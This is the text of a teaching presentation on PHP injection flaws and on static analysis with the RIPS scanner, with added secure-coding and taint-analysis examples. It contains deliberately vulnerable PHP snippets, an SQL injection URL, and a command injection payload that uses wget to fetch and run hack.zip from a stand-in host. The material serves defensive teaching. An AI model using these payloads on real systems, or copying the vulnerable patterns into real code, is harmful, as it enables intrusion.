Vulnerabilities crash course

Unsanitized user input

Quick quiz:

What happens next?

$id = $_GET['id'];
$username = "user" . $id;
mysqli_query( "
	SELECT *
	FROM Users
	WHERE Username = '" . $username . "' AND Valid = 1" );

Source: http://lotr.wikia.com

Problem:

http://example.com/?id=1' OR 1 #

$id = $_GET['id'];
$username = "user" . $id;
mysqli_query( "
	SELECT *
	FROM Users
	WHERE Username = '" . $username . "' AND Valid = 1" );

-- The statement MySQL actually receives: '#' starts a comment, so "AND Valid = 1" is ignored
SELECT *
FROM Users
WHERE Username = 'user1' OR 1 # AND Valid = 1

Source: http://xkcd.com/327

Okay, but that was fairly obvious!

But what about...

foreach ( $_REQUEST as $key => $value )
{
	$$key = $value; // every request parameter becomes a variable of the same name
}
...
// 25 lines of miscellaneous, unrelated code
...
mysqli_query(
	"SELECT * FROM Users WHERE Username = '" . $username . "'" );

Source: http://lotr.wikia.com

"Just don't do it"
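Added example, not from the slides: the quiz code rewritten so that request parameters are read explicitly (no "$$key = $value") and the query uses a prepared statement. It assumes $db is an open mysqli connection (mysqlnd-backed, for get_result()) created elsewhere.

```php
<?php
// Added example, not from the slides. $db is assumed to be an existing
// mysqli connection.

// Read only the parameter you expect, from the superglobal you expect,
// instead of letting "$$key = $value" define variables for you.
$id = $_GET['id'] ?? '';
if (!is_string($id) || !ctype_digit($id)) {
    http_response_code(400);
    exit('id must be a positive integer');
}
$username = 'user' . $id;

// The query text is sent to MySQL first and the value separately, so
// "1' OR 1 #" is compared against the Username column as a plain string
// and can no longer rewrite the WHERE clause.
$stmt = $db->prepare('SELECT * FROM Users WHERE Username = ? AND Valid = 1');
$stmt->bind_param('s', $username);
$stmt->execute();
$rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
```

The ctype_digit() check is defence in depth: the prepared statement alone already stops the injection, but rejecting anything that is not a number keeps garbage out of the Username lookup and out of the logs.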

My problem:

$taintedCmd = "wc -w " . $_GET['file'];
shell_exec( $taintedCmd );

Source: http://lotr.wikia.com

Problem:

http://example.com/?file=
  file.txt' &&
  wget http://dogeysite.com/hack.zip &&
  unzip hack.zip &&
  ./hack.sh #
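Added example, not from the slides: the wc -w snippet with the file name confined to one directory and passed through escapeshellarg() before it reaches the shell. DOCUMENT_DIR is an assumed configuration constant.

```php
<?php
// Added example, not from the slides. DOCUMENT_DIR is an assumed setting.
const DOCUMENT_DIR = '/srv/app/documents';

function wordCount(string $requested): ?int
{
    // basename() drops any directory part the client sent; realpath()
    // resolves symlinks and "..", and the prefix check confines the result
    // to DOCUMENT_DIR (a missing file makes realpath() return false).
    $path = realpath(DOCUMENT_DIR . '/' . basename($requested));
    $prefix = DOCUMENT_DIR . '/';
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // escapeshellarg() wraps the argument in single quotes and escapes any
    // embedded quote, so "&&", ";" and "'" stay part of the file name
    // instead of ending the wc command.
    $out = shell_exec('wc -w ' . escapeshellarg($path));
    return is_string($out) ? (int) $out : null;
}

$count = wordCount($_GET['file'] ?? '');
if ($count === null) {
    http_response_code(404);
    exit('no such file');
}
echo $count;
```

Two layers are deliberate: escapeshellarg() handles the shell metacharacters, and the realpath() prefix check handles the separate problem of which file the user may read. For a word count the shell is not needed at all; str_word_count(file_get_contents($path)) removes the sink entirely.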

First thought:

grep -r -B 10 -i "shell_exec" >> commandExecutions.txt

...
file.php-     $cmd = "find -name '" . $name . "' documents/";
file.php-   }
file.php- }
file.php: echo shell_exec( $cmd );

http://www.sciencephoto.com

But...

http://looneytunes09.files.wordpress.com/2010/08/landfill.jpg

How do you detect vulnerabilities in code?

http://www.google.com.au/search?q=how+do+you+detect+vulnerabilities+in+code

Static Code Analysis (SCA)

Source Code Analysis

Static Program Analysis

Compile Time Analysis (well, not for PHP)

Analysis without execution

Optimising compilers (e.g. g++)

IDEs with type checking/code completion

Step 1: Lexical analysis

Split code into tokens

Source: http://sourceforge.net/projects/rips-scanner/files/rips-paper.pdf/download

Step 2: Semantic analysis

print "print";

First print is a command

Second print is a string

Source: http://sourceforge.net/projects/rips-scanner/files/rips-paper.pdf/download
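Added example, not from the slides and not RIPS code: Step 1 and Step 2 run on the slides' own snippet with PHP's built-in tokenizer, followed by a token-aware version of the grep from the "First thought" slide. The tokenizer already tells the keyword print (T_PRINT) apart from the string literal "print" (T_CONSTANT_ENCAPSED_STRING), which is exactly the distinction the semantic step needs. The sample source in $sample is constructed for the example.

```php
<?php
// Added example, not from the slides or from RIPS.
// token_get_all() yields either a bare one-character string such as ';'
// or an array [token id, text, line number].
function tokenize(string $code): array
{
    $out = [];
    foreach (token_get_all($code) as $tok) {
        $out[] = is_array($tok) ? [token_name($tok[0]), $tok[1]] : ['CHAR', $tok];
    }
    return $out;
}

// Token-aware grep: report identifiers that name a sink and are followed
// by '('. The word shell_exec inside a string literal is one
// T_CONSTANT_ENCAPSED_STRING token, so it is not mistaken for a call.
function findSinkCalls(string $code, array $sinks): array
{
    $tokens = array_values(array_filter(token_get_all($code),
        fn($t) => !is_array($t) || $t[0] !== T_WHITESPACE));
    $hits = [];
    foreach ($tokens as $i => $t) {
        if (is_array($t) && $t[0] === T_STRING && in_array($t[1], $sinks, true)
            && ($tokens[$i + 1] ?? null) === '(') {
            $hits[] = [$t[1], $t[2]];          // [function name, line number]
        }
    }
    return $hits;
}

// Step 1 + Step 2 on the slide's snippet.
foreach (tokenize('<?php print "print";') as [$kind, $text]) {
    printf("%-28s %s\n", $kind, var_export($text, true));
}

// Constructed sample: one mention of shell_exec in a string, one real call.
$sample = <<<'PHP'
<?php
$note = "never call shell_exec on user input";
echo shell_exec($cmd);
PHP;
print_r(findSinkCalls($sample, ['shell_exec', 'system']));
```

findSinkCalls() reports only the call on the third line of $sample; plain grep would have matched the string on the second line too, which is the false-positive noise the "First thought" slide runs into.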

Step 3: Control flow analysis

function firstCall( $input ) {
	return secondCall( $input ) . " - 1st";
}

function secondCall( $input ) {
	return $input . " - 2nd";
}

firstCall( "input" );

Source: http://sourceforge.net/projects/rips-scanner/files/rips-paper.pdf/download

Step 4: Data flow analysis

function firstCall( $input ) {
	return secondCall( escapeshellarg( $input ) );
}

function secondCall( $input ) {
	return shell_exec( $input ); // Is $input safe?
}

firstCall( $_GET['input'] );  // Safe: escaped before it reaches shell_exec()
secondCall( $_GET['input'] ); // Not safe: user input goes straight to the sink

Source: http://sourceforge.net/projects/rips-scanner/files/rips-paper.pdf/download
http://www.flickr.com/photos/ruthyyy/5000648691

RIPS - PHP Scanner

http://www.phpscanner.net

Example time

Example 1

shell_exec( $_GET['input'] );
http://rips.gamma.peter.serwylo.com/
/srv/http-rips/tests/vuln1.php

Example 2

function vulnFunction( $cmd ) {
	$result = shell_exec( $cmd );
}

function intermittentFunction( $input ) {
	$param = "test " . $input . " bleh";
	vulnFunction( $param );
}

$firstHand = $_GET['input'];
$secondHand = "IMZ TAINTED: " . $firstHand . ", YEAH!";

intermittentFunction( $secondHand );
http://rips.gamma.peter.serwylo.com/
/srv/http-rips/tests/vuln2.php

Miscellaneous PHP projects from freecode.com

(formerly freshmeat.net)

Example 3


False Positives


http://www.cancrusher.co.za

Custom Securing Functions

http://winningateverything.com

Custom Securing Functions

config/securing.php

// securing functions for file handling
$F_SECURING_FILE = array(
	'sanitize_filename'
);

Custom Securing Functions

config/securing.php

// securing functions for every vulnerability
$F_SECURING_STRING = array(
	'sanitize_int',
	'intval',
	'floatval',
	'md5',
	// ...
);
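Added example, not from the slides and not RIPS code: a toy data-flow taint analysis in the spirit of Step 4 and of the securing-function lists above. It runs over a hand-built abstract syntax tree (nested PHP arrays), not over real PHP source; the node shapes ('str', 'src', 'var', 'concat', 'call') and the statement shapes ('assign', 'expr', 'return') are this example's own. A taint value is the set of vulnerability classes a value can still trigger; a securing function removes its classes, a sink reports when its own class is still present. The input at the bottom encodes Example 2 from the slides plus the escaped call from Step 4. Requires PHP 8 (constructor property promotion).

```php
<?php
// Added example, not from the slides or from RIPS: toy taint analysis over a
// hand-built AST. Taint = set of vulnerability classes still open for a value.
const ALL_TAINT = ['shell', 'sql'];
const SINKS     = ['shell_exec' => 'shell', 'mysqli_query' => 'sql'];
const SECURING  = [                          // cf. $F_SECURING_STRING above
    'escapeshellarg'            => ['shell'],
    'mysqli_real_escape_string' => ['sql'],
    'intval'                    => ['shell', 'sql'],
    'md5'                       => ['shell', 'sql'],
];

class TaintAnalyzer
{
    public array $findings = [];

    // $functions: name => ['params' => [names], 'body' => [statements]]
    public function __construct(private array $functions) {}

    // Taint set of an expression node under a variable environment.
    private function taintOf(array $e, array $env, int $depth): array
    {
        switch ($e[0]) {
            case 'str':    return [];                      // literal: safe
            case 'src':    return ALL_TAINT;               // $_GET / $_POST / ...
            case 'var':    return $env[$e[1]] ?? [];       // never assigned: safe
            case 'concat': return $this->union([$this->taintOf($e[1], $env, $depth),
                                                $this->taintOf($e[2], $env, $depth)]);
            case 'call':   return $this->taintOfCall($e[1], $e[2], $env, $depth);
        }
        throw new InvalidArgumentException("unknown node {$e[0]}");
    }

    private function union(array $sets): array
    {
        return array_values(array_unique(array_merge([], ...$sets)));
    }

    private function taintOfCall(string $name, array $args, array $env, int $depth): array
    {
        $argTaint = array_map(fn($a) => $this->taintOf($a, $env, $depth), $args);
        $all = $this->union($argTaint);

        if (isset(SECURING[$name])) {                 // securing function
            return array_values(array_diff($all, SECURING[$name]));
        }
        if (isset(SINKS[$name])) {                    // sink: report if still open
            if (in_array(SINKS[$name], $all, true)) {
                $this->findings[] = "$name() reachable from user input (" . SINKS[$name] . ")";
            }
            return [];
        }
        if (isset($this->functions[$name]) && $depth < 10) {   // user function:
            $f = $this->functions[$name];                       // follow the call
            $n = count($f['params']);
            $bound = array_combine($f['params'], array_slice(array_pad($argTaint, $n, []), 0, $n));
            return $this->runBody($f['body'], $bound, $depth + 1);
        }
        return $all;                                  // unknown builtin: propagate
    }

    // Execute statements abstractly; returns the taint of any returned value.
    private function runBody(array $stmts, array $env, int $depth): array
    {
        foreach ($stmts as $s) {
            if ($s[0] === 'assign')     $env[$s[1]] = $this->taintOf($s[2], $env, $depth);
            elseif ($s[0] === 'expr')   $this->taintOf($s[1], $env, $depth);
            elseif ($s[0] === 'return') return $this->taintOf($s[1], $env, $depth);
        }
        return [];
    }

    public function analyze(array $mainStmts): array
    {
        $this->runBody($mainStmts, [], 0);
        return $this->findings;
    }
}

// Constructed input: Example 2 from the slides, plus Step 4's escaped call.
$functions = [
    'vulnFunction' => ['params' => ['cmd'], 'body' => [
        ['assign', 'result', ['call', 'shell_exec', [['var', 'cmd']]]],
    ]],
    'intermittentFunction' => ['params' => ['input'], 'body' => [
        ['assign', 'param', ['concat', ['concat', ['str', 'test '], ['var', 'input']], ['str', ' bleh']]],
        ['expr', ['call', 'vulnFunction', [['var', 'param']]]],
    ]],
];
$main = [
    ['assign', 'firstHand',  ['src', '$_GET']],
    ['assign', 'secondHand', ['concat', ['str', 'IMZ TAINTED: '], ['var', 'firstHand']]],
    ['expr', ['call', 'intermittentFunction', [['var', 'secondHand']]]],
    ['expr', ['call', 'vulnFunction', [['call', 'escapeshellarg', [['src', '$_GET']]]]]],
];
foreach ((new TaintAnalyzer($functions))->analyze($main) as $finding) {
    echo $finding, "\n";
}
```

The first call chain is reported once (shell_exec() inside vulnFunction, two calls away from $_GET), the second is not, because escapeshellarg() removed the 'shell' class before the value reached the sink while leaving 'sql' open. That per-class bookkeeping is why RIPS keeps separate lists such as $F_SECURING_FILE and $F_SECURING_STRING: escapeshellarg() secures a shell argument, not a SQL string, and md5() secures both.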

Limitations

What I'd love to see

Plugins for php compilers (e.g. HipHop/phc/rphp)

Thanks for listening

Questions?